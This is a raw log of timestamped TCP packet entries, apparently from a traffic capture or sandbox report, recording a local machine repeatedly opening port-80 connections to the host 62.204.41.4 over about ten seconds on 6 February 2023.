                                                        Feb 6, 2023 14:18:46.374711990 CET5012980192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:46.435118914 CET805012962.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:46.435832024 CET805012862.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:46.436043978 CET5012880192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:46.436568975 CET5012980192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:46.436569929 CET5012980192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:46.496912956 CET805012962.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:46.500448942 CET805012962.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:46.500541925 CET5012980192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:46.617605925 CET5012980192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:46.618278027 CET5013080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:46.678077936 CET805012962.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:46.678450108 CET5012980192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:46.680497885 CET805013062.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:46.680613041 CET5013080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:46.681000948 CET5013080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:46.743123055 CET805013062.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:46.745626926 CET805013062.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:46.747241020 CET5013080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:46.852895975 CET5013080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:46.854176998 CET5013180192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:46.915242910 CET805013062.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:46.915383101 CET805013162.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:46.915437937 CET5013080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:46.915510893 CET5013180192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:46.931869984 CET5013180192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:46.993237019 CET805013162.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:46.996388912 CET805013162.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:46.996521950 CET5013180192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:47.102080107 CET5013180192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:47.103013992 CET5013280192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:47.163428068 CET805013262.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:47.163476944 CET805013162.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:47.163579941 CET5013280192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:47.163619995 CET5013180192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:47.164865017 CET5013280192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:47.225230932 CET805013262.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:47.230132103 CET805013262.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:47.230206013 CET5013280192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:47.352252960 CET5013280192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:47.353060961 CET5013380192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:47.412719965 CET805013262.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:47.412832022 CET5013280192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:47.415566921 CET805013362.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:47.415673971 CET5013380192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:47.416110039 CET5013380192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:47.478672981 CET805013362.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:47.481126070 CET805013362.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:47.481234074 CET5013380192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:47.585978985 CET5013380192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:47.586823940 CET5013480192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:47.647131920 CET805013462.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:47.647268057 CET5013480192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:47.648521900 CET805013362.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:47.648833990 CET5013380192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:47.648864031 CET5013480192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:47.709064960 CET805013462.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:47.712028027 CET805013462.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:47.712125063 CET5013480192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:47.821497917 CET5013480192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:47.821500063 CET5013580192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:47.881355047 CET805013562.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:47.881710052 CET5013580192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:47.881977081 CET805013462.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:47.882066965 CET5013580192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:47.882103920 CET5013480192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:47.941637993 CET805013562.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:47.944685936 CET805013562.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:47.945960999 CET5013580192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:48.055937052 CET5013580192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:48.056627035 CET5013680192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:48.116044044 CET805013562.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:48.116141081 CET5013580192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:48.117105961 CET805013662.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:48.117197990 CET5013680192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:48.120124102 CET5013680192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:48.180753946 CET805013662.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:48.184925079 CET805013662.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:48.184998035 CET5013680192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:48.298408985 CET5013680192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:48.299046993 CET5013780192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:48.359216928 CET805013662.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:48.359260082 CET805013762.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:48.359378099 CET5013680192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:48.359426975 CET5013780192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:48.518585920 CET5013780192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:48.596465111 CET805013762.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:48.596528053 CET805013762.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:48.596699953 CET5013780192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:48.752340078 CET5013880192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:48.755933046 CET5013780192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:48.814755917 CET805013862.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:48.816256046 CET805013762.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:48.816514969 CET5013780192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:48.816931963 CET5013880192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:48.816931963 CET5013880192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:48.879436970 CET805013862.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:48.882236004 CET805013862.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:48.882431984 CET5013880192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:49.004117966 CET5013880192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:49.004849911 CET5013980192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:49.065310001 CET805013962.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:49.065521955 CET5013980192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:49.066773891 CET805013862.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:49.071564913 CET5013880192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:49.109385967 CET5013980192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:49.169991016 CET805013962.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:49.174504995 CET805013962.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:49.174675941 CET5013980192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:49.694271088 CET5013980192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:49.694892883 CET5014080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:49.754947901 CET805013962.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:49.755125999 CET5013980192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:49.755281925 CET805014062.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:49.755378962 CET5014080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:49.757097960 CET5014080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:49.817576885 CET805014062.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:49.820137978 CET805014062.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:49.820281029 CET5014080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:49.997104883 CET5014080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:49.997930050 CET5014180192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:50.058044910 CET805014062.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:50.058202028 CET5014080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:50.058360100 CET805014162.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:50.058604002 CET5014180192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:50.069927931 CET5014180192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:50.130470037 CET805014162.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:50.136013031 CET805014162.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:50.136331081 CET5014180192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:50.849636078 CET5014280192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:50.849647045 CET5014180192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:50.910355091 CET805014162.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:50.910433054 CET5014180192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:50.911045074 CET805014262.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:50.911159992 CET5014280192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:50.911528111 CET5014280192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:50.972815037 CET805014262.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:50.975814104 CET805014262.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:50.975927114 CET5014280192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:51.392573118 CET5014280192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:51.398561954 CET5014380192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:51.454260111 CET805014262.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:51.454440117 CET5014280192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:51.460180998 CET805014362.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:51.460362911 CET5014380192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:51.490211964 CET5014380192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:51.551734924 CET805014362.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:51.556133986 CET805014362.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:51.556297064 CET5014380192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:51.682365894 CET5014380192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:51.683135986 CET5014480192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:51.744119883 CET805014362.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:51.744198084 CET5014380192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:51.745556116 CET805014462.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:51.745672941 CET5014480192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:51.746608973 CET5014480192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:51.809034109 CET805014462.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:51.812130928 CET805014462.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:51.812253952 CET5014480192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:51.935980082 CET5014480192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:51.936701059 CET5014580192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:51.996977091 CET805014562.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:51.997091055 CET5014580192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:51.997575045 CET5014580192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:51.998462915 CET805014462.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:51.998562098 CET5014480192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:52.057995081 CET805014562.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:52.062042952 CET805014562.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:52.062144995 CET5014580192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:52.165070057 CET5014580192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:52.165775061 CET5014680192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:52.225604057 CET805014562.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:52.225693941 CET5014580192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:52.227169991 CET805014662.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:52.227298021 CET5014680192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:52.228127956 CET5014680192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:52.289705038 CET805014662.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:52.292440891 CET805014662.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:52.292557955 CET5014680192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:52.404989958 CET5014680192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:52.405770063 CET5014780192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:52.466641903 CET805014662.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:52.466734886 CET5014680192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:52.468127966 CET805014762.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:52.468236923 CET5014780192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:52.469913960 CET5014780192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:52.532211065 CET805014762.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:52.534677982 CET805014762.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:52.534789085 CET5014780192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:52.649655104 CET5014780192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:52.650635958 CET5014880192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:52.712186098 CET805014762.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:52.712692022 CET805014862.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:52.712846994 CET5014780192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:52.712928057 CET5014880192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:52.713607073 CET5014880192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:52.776207924 CET805014862.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:52.778877020 CET805014862.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:52.779061079 CET5014880192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:52.884721994 CET5014880192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:52.885600090 CET5014980192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:52.946945906 CET805014862.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:52.947062969 CET5014880192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:52.947434902 CET805014962.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:52.947562933 CET5014980192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:52.948054075 CET5014980192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:53.009670019 CET805014962.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:53.012109041 CET805014962.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:53.015983105 CET5014980192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:53.118680000 CET5014980192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:53.119591951 CET5015080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:53.179096937 CET805015062.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:53.179362059 CET5015080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:53.180274963 CET5015080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:53.180468082 CET805014962.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:53.180581093 CET5014980192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:53.239737988 CET805015062.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:53.244153023 CET805015062.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:53.246844053 CET5015080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:53.352600098 CET5015080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:53.353358030 CET5015180192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:53.412791014 CET805015062.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:53.413472891 CET805015162.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:53.413585901 CET5015080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:53.413599968 CET5015180192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:53.414299965 CET5015180192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:53.474468946 CET805015162.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:53.476975918 CET805015162.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:53.479885101 CET5015180192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:53.587193012 CET5015180192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:53.587903976 CET5015280192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:53.647614002 CET805015162.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:53.647883892 CET5015180192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:53.648303032 CET805015262.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:53.648428917 CET5015280192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:53.649178982 CET5015280192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:53.709445000 CET805015262.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:53.712241888 CET805015262.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:53.712398052 CET5015280192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:53.821186066 CET5015280192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:53.821886063 CET5015380192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:53.881567001 CET805015262.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:53.881742954 CET5015280192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:53.882462978 CET805015362.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:53.882605076 CET5015380192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:53.883683920 CET5015380192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:53.944363117 CET805015362.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:53.947201014 CET805015362.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:53.947278023 CET5015380192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:54.055777073 CET5015380192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:54.058582067 CET5015480192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:54.116650105 CET805015362.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:54.116843939 CET5015380192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:54.119086027 CET805015462.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:54.119780064 CET5015480192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:54.119780064 CET5015480192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:54.180300951 CET805015462.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:54.184797049 CET805015462.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:54.187201023 CET5015480192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:54.292507887 CET5015580192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:54.292515039 CET5015480192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:54.352936983 CET805015562.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:54.353086948 CET805015462.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:54.353178978 CET5015580192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:54.353552103 CET5015480192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:54.353665113 CET5015580192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:54.413866997 CET805015562.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:54.416800022 CET805015562.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:54.416975975 CET5015580192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:54.524848938 CET5015580192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:54.525835037 CET5015680192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:54.585196018 CET805015562.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:54.585362911 CET5015580192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:54.587413073 CET805015662.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:54.587549925 CET5015680192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:54.587905884 CET5015680192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:54.649532080 CET805015662.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:54.652446032 CET805015662.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:54.652595043 CET5015680192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:54.759784937 CET5015680192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:54.760524988 CET5015780192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:54.821548939 CET805015662.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:54.821662903 CET5015680192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:54.821907997 CET805015762.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:54.822009087 CET5015780192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:54.822505951 CET5015780192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:54.883938074 CET805015762.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:54.886236906 CET805015762.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:54.887202978 CET5015780192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:55.009448051 CET5015780192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:55.010067940 CET5015880192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:55.070971012 CET805015762.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:55.071693897 CET805015862.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:55.071788073 CET5015880192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:55.072109938 CET5015780192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:55.072146893 CET5015880192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:55.133867025 CET805015862.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:55.137774944 CET805015862.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:55.137881994 CET5015880192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:55.243232012 CET5015880192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:55.244338036 CET5015980192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:55.304794073 CET805015962.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:55.304923058 CET805015862.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:55.304949999 CET5015980192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:55.304984093 CET5015880192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:55.306571960 CET5015980192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:55.367019892 CET805015962.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:55.369514942 CET805015962.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:55.369604111 CET5015980192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:55.477401018 CET5015980192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:55.478825092 CET5016080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:55.537992001 CET805015962.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:55.538285971 CET5015980192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:55.540307999 CET805016062.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:55.540617943 CET5016080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:55.547494888 CET5016080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:55.608886003 CET805016062.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:55.611332893 CET805016062.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:55.614665031 CET5016080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:55.728780031 CET5016080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:55.729760885 CET5016180192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:55.790339947 CET805016162.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:55.790374994 CET805016062.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:55.790497065 CET5016080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:55.790575027 CET5016180192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:55.790925026 CET5016180192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:55.851387024 CET805016162.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:55.854116917 CET805016162.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:55.854198933 CET5016180192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:55.963422060 CET5016180192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:55.964293957 CET5016280192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:56.024871111 CET805016162.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:56.025418043 CET805016262.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:56.025564909 CET5016180192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:56.025602102 CET5016280192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:56.026170015 CET5016280192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:56.086483002 CET805016262.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:56.090836048 CET805016262.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:56.091022968 CET5016280192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:56.201147079 CET5016280192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:56.201858044 CET5016380192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:56.261713028 CET805016262.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:56.263071060 CET5016280192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:56.264277935 CET805016362.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:56.264457941 CET5016380192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:56.264796972 CET5016380192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:18:56.327121973 CET805016362.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:18:56.329933882 CET805016362.204.41.4192.168.2.5
